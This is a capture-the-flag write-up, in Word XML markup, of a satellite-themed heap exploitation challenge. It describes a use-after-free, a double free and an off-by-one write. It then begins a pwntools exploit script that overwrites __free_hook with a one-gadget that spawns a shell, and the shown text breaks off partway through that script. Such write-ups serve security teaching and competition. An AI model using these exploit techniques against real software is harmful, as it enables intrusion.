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agic-space-bussin"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Magic Space Bussin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Category</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Pure Pwnage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”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The challenge is a C++ application for which we are given both the compiled binary (called</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">magic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and the source code. It can be run using the provided challenge files, which include a couple of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files and a top level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:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Building a local copy: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make static</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Running the challenge: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make build     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Build Docker containers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make challenge </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Run challenge locally through socat + Docker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magic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">binary is started we are greeted with a menu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">startracker 1 pipe_id: 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">startracker 2 pipe_id: 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1: Post message on bus</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2: Handle startracker 1 messages</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">3: Handle startracker 2 messages</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">4: Exit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Option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allows us to send messages on a pipe:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">startracker 1 pipe_id: 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">startracker 2 pipe_id: 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1: Post message on bus</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2: Handle startracker 1 messages</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">3: Handle startracker 2 messages</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">4: Exit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msg_id: 100</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pipe_id: 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hex: 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Message to post on bus: AAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Clearing msg (0 : 100)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When sending messages we are asked for 4 parameters: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msg_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Identifies the function that will get executed when the message is read from the pipe, the only valid value is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">100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pipe_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Identifies the pipe on which the message will be sent, valid values are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255</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(broadcast)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hex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: A boolean value that indicated whether the message content is hex-encoded or not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Message to post on bus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The message content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Option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allow us to pop messages that were sent respectively in pipe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The only valid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msg_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is 100, and when such a message is received on a pipe the program simply prints the hex-encoded message byte by byte. For example:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">startracker 1 pipe_id: 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">startracker 2 pipe_id: 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1: Post message on bus</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2: Handle startracker 1 messages</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">3: Handle startracker 2 messages</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">4: Exit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msg_id: 100</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pipe_id: 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">hex: 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Message to post on bus: AAAAAAAA</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Clearing msg (0 : 100)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1: Post message on bus</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2: Handle startracker 1 messages</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">3: Handle startracker 2 messages</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">4: Exit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; 2</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">StarTracker: Testing Message</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Clearing msg (0 : 100)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkStart w:id="23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There are two vulnerabilities in the challenge, the first one is a use-after-free (UAF) plus a double free, and the second one is an off-by-one out-of-bounds write.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="21" w:name="uaf-double-free"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UAF + double free</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each pipe has a maximum message capacity of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which means that after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messages you will no longer be able to send messages on that pipe unless you pop some of them by using option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BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When sending a message to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pipe_id = 255</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the message is broadcasted to both pipe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  <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The UAF occurs when we broadcast a message with the pipe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full.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">After failing to send the message to pipe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(at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[5]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i = 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) the program frees the pointer containing the message data and then keeps broadcasting the freed message to pipe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Which means that when the message is sent to pipe 1 (at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[4]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i = 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) the pipe will store a freed pointer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// pipe_id 255 -&gt; broadcast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payload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pipe_id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UINT8_MAX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[1]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bail out if too many pipes are subscribed to a msg_id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msg_id_pipe_lens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payload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msg_max_subs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[2]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for each pipe subscribed to this msg_id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(pipe 0 and 1 are subscribed to the only available msg_id -&gt; 100)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msg_id_pipe_lens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payload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cur_pipe_num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msg_id_pipe_map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payload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[3]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the last pipe stores the pointer used to read the message content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other pipes always receive a new copy of that buffer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msg_id_pipe_lens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payload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]-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pipe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GetPipeByNum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cur_pipe_num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[4]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copy is false then the pipe will store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payload-&gt;data without copying it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SendMsgToPipe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copy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SB_SUCCESS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LOG_ERR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"Unable to send payload to Pipe Num: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cur_pipe_num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[5]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when sending a message on a full pipe `SendMsgToPipe` will fail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and payload-&gt;data will be freed</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                delete payload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SB_FAIL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LOG_ERR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 pipes subscribed to Msg ID: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delete payload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SB_FAIL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payload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LOG_ERR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"Too many pipes subscribed to Msg ID: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Bailing out...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msg_id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When receiving a message from a pipe the data pointer is freed, which means that if, after triggering this UAF, we receive the first message from the pipe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, we will trigger a double free.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="22" w:name="off-by-one"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Off-by-one</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The off-by-one write occurs when sending an hex-encoded message with an odd length:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">size_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> SB_Pipe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CalcPayloadLen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ishex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ishex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SB_Pipe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AllocatePlBuff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ishex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ishex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 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 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invoked when sending a message on a pipe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SB_Msg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SB_Pipe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ParsePayload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ishex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pipe_id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msg_id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 buf on the heap of sz = s.length() / 2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msg_s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AllocatePlBuff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ishex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user sent `hex: 1`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ishex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cur_byte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s.lenth() is odd `CalcPayloadLen()` returns s.length()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instead of s.length() / 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CalcPayloadLen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ishex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cur_byte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cur_byte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msg_s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strtol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cur_byte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CalcPayloadLen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ishex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msg_s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only control the lower nibble of byte written oob, the higher nibble is always set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because</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strtoul()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">only sees a 1-character string.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="25" w:name="exploitation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In short, we used the UAF to get a libc leak from a freed unsorted bin, and the double free in combination with the off-by-one oob write to get arbitrary write and overwrite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__free_hook</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">with a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">one gadget</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that calls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">execve("/bin/sh", 0, 0)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The complete exploit script is provided below and explains the relevant exploitation steps in more detail through comments in the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pwn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exe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ELF(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./magic_patched'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, checksec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libc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ELF(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'./libc_debug-2.31.so'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, checksec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context.binary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</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TICKET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b'ticket{quebec703978whiskey4:GEmu1G0NX1z6syFsVFKuX0vLGEw0ULBraF16mEtKzS4qEdVXUd8NgwhCMM9Y4bpAjg}'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conn():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args.GDB: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gdb.debug([exe.path])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args.REMOTE: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remote(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'magic.quals2023-kah5Aiv9.satellitesabove.me'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r.sendlineafter(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'Ticket please: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TICKET)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process([exe.path])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post_msg(msg_id, pipe_id, ishex, msg, pwn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r.sendline(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'1'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r.recvuntil(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'msg_id: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r.sendline(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'%d'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msg_id)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    r.recvuntil(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'pipe_id: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r.sendline(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'%d'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pipe_id)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    r.recvuntil(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'hex: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r.sendline(ishex)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    r.recvuntil(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'Message to post on bus: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r.sendline(msg)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pwn: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r.recvuntil(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; 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re.match(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'(.)*Clearing msg \((\d+) : (\d+)\)'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, data, re.DOTALL)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m.group(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log.warning(m.group(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).decode())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(m.group(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(m.group(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handle(startracker_id):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startracker_id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startracker_id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log.error(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Invalid startracker_id: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startracker_id)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startracker_id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r.sendline(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'2'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startracker_id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r.sendline(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'3'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b'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1: Post message on bus'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r.recvuntil(STOP)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(STOP)]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b'Testing Message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re.findall(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">rb'0x(..)'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, data)))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    r.recvuntil(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'&gt;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alloc(pipe_id, data, pwn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post_msg(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pipe_id, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'0'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, data, pwn)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alloc_hex(pipe_id, data):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    post_msg(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pipe_id, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, data)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broadcast(data):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    post_msg(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b'0'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, data)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free(pipe_id):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handle(pipe_id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conn()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    r.recvuntil(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; 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pipe 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alloc(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b'-'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Allocate a chunk of sz 0x140 (target chunk)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will get stored freed in the pipe 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 offset 0xf0 we create a fake next_chunk, so that when we overwrite the last byte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of the sz = 0x140 to sz = 0x100 we will have a valid prev_inuse bit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    broadcast(flat({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0xf0</w:t>
      </w:r>
